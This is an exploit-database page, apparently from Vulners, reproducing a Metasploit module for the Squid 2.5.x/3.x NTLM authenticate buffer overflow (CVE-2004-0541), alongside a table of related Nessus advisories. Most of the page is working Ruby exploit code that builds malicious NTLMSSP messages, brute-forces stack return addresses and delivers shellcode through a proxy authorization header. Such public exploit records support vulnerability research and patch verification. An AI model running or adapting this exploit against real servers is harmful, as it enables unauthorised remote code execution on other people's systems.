Vulners
Lucene search
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 32 |
|---|---|---|---|---|
 | Squid < 2.5.STABLE6 NTLM Buffer Overflow | 30 Aug 200400:00 | – | nessus |
| Fedora Core 1 : squid-2.5.STABLE3-2.fc1 (2004-163) | 23 Jul 200400:00 | – | nessus |
| Fedora Core 2 : squid-2.5.STABLE5-4.fc2 (2004-164) | 23 Jul 200400:00 | – | nessus |
| FreeBSD : Buffer overflow in Squid NTLM authentication helper (6f955451-ba54-11d8-b88c-000d610a3b12) | 23 Apr 200900:00 | – | nessus |
| FreeBSD : Buffer overflow in Squid NTLM authentication helper (183) | 6 Jul 200400:00 | – | nessus |
| GLSA-200406-13 : Squid: NTLM authentication helper buffer overflow | 30 Aug 200400:00 | – | nessus |
| Mandrake Linux Security Advisory : squid (MDKSA-2004:059) | 31 Jul 200400:00 | – | nessus |
| RHEL 3 : squid (RHSA-2004:242) | 6 Jul 200400:00 | – | nessus |
| Squid ntlm_check_auth Function NTLM Authentication Helper Password Handling Remote Overflow | 30 Jun 200400:00 | – | nessus |
| SuSE-SA:2004:016: squid | 25 Jul 200400:00 | – | nessus |
10
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Brute
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Squid NTLM Authenticate Overflow',
'Description' => %q{
This is an exploit for Squid's NTLM authenticate overflow
(libntlmssp.c). Due to improper bounds checking in
ntlm_check_auth, it is possible to overflow the 'pass'
variable on the stack with user controlled data of a user
defined length. Props to iDEFENSE for the advisory.
},
'Author' => 'skape',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0541'],
[ 'OSVDB', '6791'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'],
[ 'BID', '10500'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 256,
'MinNops' => 16,
'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80",
'PrependEncoder' => "\x83\xec\x7f",
},
'Targets' =>
[
[ 'Linux Bruteforce',
{
'Platform' => 'linux',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c },
'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc },
'Step' => 0
}
},
],
],
'DisclosureDate' => 'Jun 8 2004',
'DefaultTarget' => 0))
register_advanced_options(
[
# We must wait 15 seconds between each attempt so as to prevent
# squid from exiting completely after 5 crashes.
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]),
], self.class)
end
def brute_exploit(addresses)
site = "http://" + rand_text_alpha(rand(128)) + ".com"
print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
connect
trasnmit_negotiate(site)
transmit_authenticate(site, addresses)
handler
disconnect
end
def trasnmit_negotiate(site)
negotiate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE
"\x07\x00\xb2\x07" + # flags
"\x01\x00\x09\x00" + # workgroup len/max (1)
"\x01\x00\x00\x00" + # workgroup offset (1)
"\x01\x00\x03\x00" + # workstation len/max (1)
"\x01\x00\x00\x00" # workstation offset (1)
print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
"\r\n"
sock.put(req)
end
def transmit_authenticate(site, addresses)
overflow =
rand_text_alphanumeric(0x20) +
[addresses['Ret']].pack('V') +
[addresses['Valid']].pack('V') +
"\xff\x00\x00\x00"
shellcode = payload.encoded
pass_len = [overflow.length + shellcode.length].pack('v')
authenticate =
"NTLMSSP\x00" + # NTLMSSP identifier
"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE
pass_len + pass_len + # lanman response len/max
"\x38\x00\x00\x00" + # lanman response offset (56)
"\x01\x00\x01\x00" + # nt response len/max (1)
"\x01\x00\x00\x00" + # nt response offset (1)
"\x01\x00\x01\x00" + # domain name len/max (1)
"\x01\x00\x00\x00" + # domain name offset (1)
"\x01\x00\x01\x00" + # user name (1)
"\x01\x00\x00\x00" + # user name offset (1)
"\x00\x00\x00\x00" + # session key
"\x8b\x00\x00\x00" + # session key
"\x06\x82\x00\x02" + # flags
overflow + shellcode
print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
req =
"GET #{site} HTTP/1.1\r\n" +
"Proxy-Connection: Keep-Alive\r\n" +
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
"\r\n"
sock.put(req)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2004 00:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 210
EPSS0.76951